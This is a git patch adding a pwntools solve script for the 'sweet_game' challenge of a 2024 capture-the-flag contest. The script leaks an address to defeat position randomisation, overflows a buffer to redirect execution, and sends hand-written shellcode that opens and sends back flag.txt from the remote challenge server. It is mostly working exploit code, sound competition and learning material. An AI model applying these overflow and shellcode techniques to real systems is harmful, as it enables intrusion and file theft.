From 0cccb2f164d41ce2dcfa2d2fd79a47994bd12fd1 Mon Sep 17 00:00:00 2001
From: jc <jc@git.server>
Date: Tue, 22 Oct 2024 01:51:17 +0300
Subject: [PATCH] solve script

---
 africabattlectf_2024/sweet_game/a.py | 46 ++++++++++++++++++++++++++++
 1 file changed, 46 insertions(+)
 create mode 100644 africabattlectf_2024/sweet_game/a.py

diff --git a/africabattlectf_2024/sweet_game/a.py b/africabattlectf_2024/sweet_game/a.py
new file mode 100644
index 0000000..c7729eb
--- /dev/null
+++ b/africabattlectf_2024/sweet_game/a.py
@@ -0,0 +1,46 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./sweet_game", checksec=False)
+# r = process()
+r = remote("challenge.bugpwn.com", 1001)
+
+offset = 48
+
+# leak
+buf = b"A"*66
+r.sendafter(b": ", buf)
+r.recvuntil(b"A"*66)
+main = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("main: 0x%lx", main)
+elf_base = main - 0x15bc
+log.info("elf_base: 0x%lx", elf_base)
+call_shellcode = elf_base + 0x16d2
+log.info("call_shellcode: 0x%lx", call_shellcode)
+
+# jump
+buf = b"A"*offset
+buf += p64(call_shellcode)
+r.sendlineafter(b": ", buf)
+
+# openat + sendfile
+shellcode="""
+lea rsi, [rdx+38]
+mov edi, -100
+xor rdx, rdx
+xor r10, r10
+add ax, 257
+syscall
+xor rsi, rsi
+mov rsi, rax
+mov al, 40
+shr edi, 255
+add r10b, 255
+syscall
+"""
+shellcode = asm(shellcode)
+shellcode += b"flag.txt\0"
+r.sendlineafter(b": ", shellcode)
+
+r.interactive()
\ No newline at end of file